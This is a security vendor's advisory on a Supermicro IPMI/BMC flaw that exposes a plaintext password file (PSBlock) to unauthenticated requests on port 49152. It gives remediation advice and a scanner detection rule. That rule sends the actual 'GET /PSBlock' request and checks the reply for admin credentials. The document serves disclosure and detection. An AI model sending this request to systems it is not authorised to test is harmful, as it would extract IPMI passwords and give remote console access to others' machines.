VERT Alert - Supermicro IPMI/BMC Plaintext Password Disclosure

Vulnerability Description

Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to request the file PSBlock via port 49152. This plaintext password file contains IPMI username and password information.

Exposure & Impact

An attacker could gain credentialed to access via IPMI on vulnerable Supermicro systems. Supermicro IPMI allows remote graphical and text-based console access to a system, which gives an attacker a great deal of flexibility. Current reports indicate that nearly 32,000 hosts that are vulnerable to this issue are accessible on the Internet.

Remediation & Mitigation

The latest firmware offerings from Supermicro are not vulnerable, users that can flash their firmware should do so immediately.

The referenced cari.net blog post below contains information on a temporary mitigation in cases where flashing the firmware is not a possibility.

Detection

IP360

ASPL-568 will ship with detection for this vulnerability. In the meantime, customers can insert the following custom vulnerability to provide detection if they require immediate coverage can insert this rule and associate with the HTTP application. Scans will need to be run with Enhanced App Scan enabled.

EXECUTE {
rule.SEND("GET /PSBlock HTTP/1.0\r\n\r\n")
rule.waitForData()
strHeaders = rule.buffer
rule.waitForData()
strPSBlock = rule.buffer
if 'admin' in strPSBlock:
    rule.STOP(True)
rule.STOP(False)
}

References

http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/